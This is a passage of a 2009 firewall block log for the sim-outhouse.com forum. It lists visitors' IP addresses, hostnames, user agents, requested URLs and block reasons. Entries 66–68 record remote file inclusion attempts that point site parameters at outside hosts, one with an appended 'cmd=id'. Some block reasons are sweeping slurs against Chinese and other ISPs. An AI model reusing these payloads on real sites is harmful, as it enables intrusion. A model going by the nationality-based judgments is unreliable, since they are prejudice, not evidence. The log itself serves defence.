User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=5&order=desc&page=3
#: 64 @: Thu, 10 Dec 2009 03:08:55 -0500
Host: port-92-196-27-86.dynamic.qsc.de
IP: 92.196.27.86
Score: 1
Why blocked: RBN.
Query:
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Reconstructed URL: http://
www.sim-outhouse.com /
#: 65 @: Thu, 10 Dec 2009 03:22:21 -0500
Host: chello084010015061.chello.pl
IP: 84.10.15.61
Score: 1
Why blocked: Filthy ISP/Host, constant source of attacks.
Query:
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Reconstructed URL: http:// sim-outhouse.com /sohforums/index.php
#: 66 @: Thu, 10 Dec 2009 03:28:50 -0500
Host: 78.84.160.202
IP: 78.84.160.202
Score: 2
Why blocked: Question mark at end of query. RFI (http). .
Query: f=http://217.218.225.2:2082/index.html?
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/forumdisplay.php?f=http://217.218.225.2:2082/index.html?
#: 67 @: Thu, 10 Dec 2009 03:50:19 -0500
Host: s0106000bdb543299.cg.shawcable.net
IP: 24.66.63.92
Score: 2
Why blocked: Question mark at end of query. RFI (http). .
Query: loc=http://217.218.225.2:2082/index.html?
Referer:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Reconstructed URL: http://
www.sim-outhouse.com /index.php?loc=http://217.218.225.2:2082/index.html?
#: 68 @: Thu, 10 Dec 2009 03:50:45 -0500
Host: plesk1.netspace.net.au
IP: 203.10.110.240
Score: 2
Why blocked: RFI (http). Rogue Site Crawler (modsecurity.org). .
Query: loc=http://busca.uol.com.br/uol/index.html?&cmd=id
Referer:
User Agent: DataCha0s/2.0
Reconstructed URL: http://
www.sim-outhouse.com /index.php?loc=http://busca.uol.com.br/uol/index.html?&cmd=id
#: 69 @: Thu, 10 Dec 2009 04:00:58 -0500
Host: 122-127-116-164.dynamic.hinet.net
IP: 122.127.116.164
Score: 1
Why blocked: Ridin' dirty Chinese ISP.
Query: lloc=downloads&loc=downloads&page=info&FileID=9053
Referer:
http://www.google.com.tw/search?hl=...71tw272&q=fs-2004++f-2b&btng=搜尋&meta=&aq=f&oq=
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Reconstructed URL: http://
www.sim-outhouse.com /index.php?lloc=downloads&loc=downloads&page=info&FileID=9053
#: 70 @: Thu, 10 Dec 2009 04:01:05 -0500
Host: 122-127-116-164.dynamic.hinet.net
IP: 122.127.116.164
Score: 1
Why blocked: Ridin' dirty Chinese ISP.
Query: t=15569
Referer:
http://www.google.com.tw/search?hl=...71tw272&q=fs-2004++f-2b&btng=搜尋&meta=&aq=f&oq=
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=15569
#: 71 @: Thu, 10 Dec 2009 04:01:18 -0500
Host: 122-127-116-164.dynamic.hinet.net
IP: 122.127.116.164
Score: 1
Why blocked: Ridin' dirty Chinese ISP.
Query: t=15569
Referer:
http://www.google.com.tw/search?hl=...71tw272&q=fs-2004++f-2b&btng=搜尋&meta=&aq=f&oq=
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.3; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=15569
#: 72 @: Thu, 10 Dec 2009 04:10:11 -0500
Host: 95.71.144.102
IP: 95.71.144.102
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/sohforums/register.php?
User Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 73 @: Thu, 10 Dec 2009 04:10:41 -0500
Host: 95.71.144.102
IP: 95.71.144.102
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/sohforums/register.php?
User Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 74 @: Thu, 10 Dec 2009 04:11:11 -0500
Host: 95.71.144.102
IP: 95.71.144.102
Score: 1
Why blocked: No registrations, or logins, from hosts listed as hostile on
http://www.stopforumspam.com/ . .
Query:
Referer:
http://www.sim-outhouse.com/register.php?
User Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/register.php?
#: 75 @: Thu, 10 Dec 2009 05:06:39 -0500
Host: bzq-79-183-250-185.red.bezeqint.net
IP: 79.183.250.185
Score: 1
Why blocked: Bothost and/or Server Farm.
Query: t=23918
Referer:
http://www.google.co.il/search?hl=iw&source=hp&q=hd5870+fsx&meta=&aq=f&oq=
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=23918
#: 76 @: Thu, 10 Dec 2009 05:06:49 -0500
Host: bzq-79-183-250-185.red.bezeqint.net
IP: 79.183.250.185
Score: 1
Why blocked: Bothost and/or Server Farm.
Query: t=23918
Referer:
http://www.google.co.il/search?hl=i...ed=0cayqbsga&q=hd5870+fsx+performance&spell=1
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/showthread.php?t=23918
#: 77 @: Thu, 10 Dec 2009 05:14:56 -0500
Host: pdway.adamind.com
IP: 194.90.190.42
Score: 1
Why blocked: Israel Server-Farm, sometimes use Python-urllib/1.17, does not use robots.txt.
Query:
Referer:
User Agent: omgilibot/0.3 +
http://www.omgili.com/Crawler.html
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/
#: 78 @: Thu, 10 Dec 2009 05:15:56 -0500
Host: pdway.adamind.com
IP: 194.90.190.42
Score: 1
Why blocked: Israel Server-Farm, sometimes use Python-urllib/1.17, does not use robots.txt.
Query:
Referer:
User Agent: omgilibot/0.3 +
http://www.omgili.com/Crawler.html
Reconstructed URL: http://
www.sim-outhouse.com /sohforums/